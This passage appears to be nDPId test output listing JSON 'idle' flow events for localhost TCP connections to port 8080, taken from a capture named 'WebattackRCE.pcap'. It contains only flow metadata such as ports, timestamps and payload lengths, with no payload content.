-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 